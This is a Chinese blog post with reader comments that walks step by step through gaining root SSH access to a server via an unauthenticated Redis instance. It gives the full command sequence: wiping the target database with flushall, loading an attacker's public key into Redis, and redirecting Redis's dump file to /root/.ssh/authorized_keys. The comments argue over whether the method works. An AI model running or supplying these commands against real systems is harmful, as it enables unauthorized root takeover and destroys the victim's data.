文档章节

通过redis入侵服务器的步骤

独钓渔
 独钓渔
发布于 2015/11/18 18:58
字数 311
阅读 2793
收藏 29
点赞 1
评论 5

通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。

一,生成本地ssh公钥

ssh-keygen

 

二,先连接redis看看

telnet 192.168.15.10 6379
redis-cli -h 192.168.15.10

 

 

三, 清一下redis数据库

redis-cli -h 192.168.15.10 flushall

 

 

四, 向redis写自己的公钥

cat key.txt |redis-cli -h 192.168.15.10 -x set redis

 

 

五, 利用redis写入到文件中

#连接redis
#redis-cli -h 192.168.15.10
#查看keys
192.168.15.10>keys *
#写入配置库的路径及存放位置
192.168.15.10>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
192.168.15.10>CONFIG SET dbfilename "authorized_keys"
#写入
192.168.15.10>save
#退出
192.168.15.10>exit

 

 

六, 远程连接

ssh root@192.168.15.10

 

 

注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件的位置,以及redis可以默认的可以随意访问性的。当然有许多可以猜。

这个是最近redis爆出来的。

 

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

 

© 著作权归作者所有

共有 人打赏支持
独钓渔
粉丝 47
博文 375
码字总数 142587
作品 0
沙坪坝
系统管理员
加载中

评论(5)

独钓渔
独钓渔

引用来自“独钓渔”的评论

引用来自“likebeta”的评论

redis保存的文件是自定义的格式, 应该是不行的吧

可以的,请测试

引用来自“likebeta”的评论

我试了, authorized_keys中保存的不只是ssh-key, 登陆不了
我试了,确实可以。 你要把自己的公钥写到key值上去。
likebeta
likebeta

引用来自“独钓渔”的评论

引用来自“likebeta”的评论

redis保存的文件是自定义的格式, 应该是不行的吧

可以的,请测试
我试了, authorized_keys中保存的不只是ssh-key, 登陆不了
独钓渔
独钓渔

引用来自“likebeta”的评论

redis保存的文件是自定义的格式, 应该是不行的吧

可以的,请测试
likebeta
likebeta
redis保存的文件是自定义的格式, 应该是不行的吧
金拱门
金拱门
mark一下。这个洞好玩79
Linux Redis自动化挖矿感染蠕虫分析及安全建议

欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 自从Redis未授权问题获取Linux系统root权限的攻击方法的披露后,由于其易用性,利用该问题入侵Linux服务进行挖矿、扫描等的黑客行...

腾讯云加社区
06/12
0
0
服务器被入侵(minerd挖矿程序)

一:问题说明 1、我的服务器是使用的阿里云的CentOS,收到的阿里云发来的提示邮件如下 然后我查看了运行的进程情况( 命令),看到一个名为minerd的进程占用了99.5%的CPU 2、minerd是个挖矿程...

奔跑的阿飞
2017/09/05
0
0
记一次服务器被挖矿程序入侵的解决过程

公司有台做voip的服务器最近CPU总是跑满,这机器自从交给厂家搭好环境后基本就没怎么管它,于是进去查看进程,top了下(见下图)这个叫wnTKYg的进程很诡异,已经把CPU吃光了,上网一查,原来...

Tyrant0532
2017/12/05
0
0
Redis 未授权漏洞利用实践

服务器准备 2台服务器 192.168.63.202 安装redis 默认端口6379 root启动redis 192.168.63.203 模拟入侵端 1、在192.168.63.203(入侵端)上生成key 输入命令:ssh-keygen,然后一路回车,在当...

Johnny_feng
2016/09/22
182
0
CentOS7.X安装Redis-4.0.8以及Redis集群搭建

安装redis 安装前的准备 下载解压并安装 创建配置中要求的数据文件存储位置 添加修改配置文件参考配置 修改目录归属 启动redis并设置开机启动 存入数据 批量删除匹配规则数据 Redis宕机 aof文...

qq2233466866
06/11
0
0
阿里云服务器被挖矿病毒minerd入侵的解决方法

早晨上班像往常一样对服务器进行例行巡检,发现一台阿里云服务器的CPU的资源占用很高,到底是怎么回事呢,赶紧用top命令查看了一下,发现是一个名为minerd的进程占用了很高的CPU资源,miner...

宏伟的版图
2017/12/28
0
0
redis攻击事件

听到朋友说接到阿里云的报障,提示黑客把他的服务器当肉鸡了,当时有点怕怕,继而官方的网络带宽也爆了进而系统处于瘫痪,当时我需要帮他处理这个问题 1 在没有查到杀手之前我是先把带宽&端口...

baishuchao
2017/08/16
0
0
安全研究 Linux 遭入侵,挖矿进程被隐藏案例分析

  一、背景   云鼎实验室曾分析不少入侵挖矿案例,研究发现入侵挖矿行为都比较粗暴简单,通过 top 等命令可以直接看到恶意进程,挖矿程序与进程不会被刻意隐藏;而现在,我们发现黑客开始...

FreeBuf
06/26
0
0
详解Redis数据库配置不当遭恶意入侵过程

Redis数据库简介 Redis(REmote DIctionary Server)是一款开源、支持网络、基于内存的高级键值对(Key-Value)存储数据库,其使用C语言编写实现。Redis通常被称为数据结构服务器,因为数据库...

iphoenix
2016/08/03
52
0
安装redis和php-redis扩展的那点事

是在centos7环境下进行安装,由于yum中没有redis的rpm包直接下载,需要编译,首先通过yum安装gcc make,以下是安装redis的步骤: 1、安装gcc make: yum install gcc make -y 2、下载redis,...

RitaChen
2016/11/15
165
0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

实现异步有哪些方法

有哪些方法可以实现异步呢? 方式一:java 线程池 示例: @Test public final void test_ThreadPool() throws InterruptedException { ScheduledThreadPoolExecutor scheduledThre......

黄威
今天
0
0
linux服务器修改mtu值优化cpu

一、jumbo frames 相关 1、什么是jumbo frames Jumbo frames 是指比标准Ethernet Frames长的frame,即比1518/1522 bit大的frames,Jumbo frame的大小是每个设备厂商规定的,不属于IEEE标准;...

六库科技
今天
0
0
牛客网刷题

1. 二维数组中的查找(难度:易) 题目描述 在一个二维数组中(每个一维数组的长度相同),每一行都按照从左到右递增的顺序排序,每一列都按照从上到下递增的顺序排序。请完成一个函数,输入...

大不了敲一辈子代码
今天
0
0
linux系统的任务计划、服务管理

linux任务计划cron 在linux下,有时候要在我们不在的时候执行一项命令,或启动一个脚本,可以使用任务计划cron功能。 任务计划要用crontab命令完成 选项: -u 指定某个用户,不加-u表示当前用...

黄昏残影
昨天
0
0
设计模式:单例模式

单例模式的定义是确保某个类在任何情况下都只有一个实例,并且需要提供一个全局的访问点供调用者访问该实例的一种模式。 实现以上模式基于以下必须遵守的两点: 1.构造方法私有化 2.提供一个...

人觉非常君
昨天
0
0
《Linux Perf Master》Edition 0.4 发布

在线阅读:https://riboseyim.gitbook.io/perf 在线阅读:https://www.gitbook.com/book/riboseyim/linux-perf-master/details 百度网盘【pdf、mobi、ePub】:https://pan.baidu.com/s/1C20T......

RiboseYim
昨天
1
0
conda 换源

https://mirrors.tuna.tsinghua.edu.cn/help/anaconda/ conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/conda config --add channels https://mir......

阿豪boy
昨天
1
0
Confluence 6 安装补丁类文件

Atlassian 支持或者 Atlassian 缺陷修复小组可能针对有一些关键问题会提供补丁来解决这些问题,但是这些问题还没有放到下一个更新版本中。这些问题将会使用 Class 类文件同时在官方 Jira bug...

honeymose
昨天
0
0
非常实用的IDEA插件之总结

1、Alibaba Java Coding Guidelines 经过247天的持续研发,阿里巴巴于10月14日在杭州云栖大会上,正式发布众所期待的《阿里巴巴Java开发规约》扫描插件!该插件由阿里巴巴P3C项目组研发。P3C...

Gibbons
昨天
1
0
Tomcat介绍,安装jdk,安装tomcat,配置Tomcat监听80端口

Tomcat介绍 Tomcat是Apache软件基金会(Apache Software Foundation)的Jakarta项目中的一个核心项目,由Apache、Sun和其他一些公司及个人共同开发而成。 java程序写的网站用tomcat+jdk来运行...

TaoXu
昨天
0
0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

返回顶部
顶部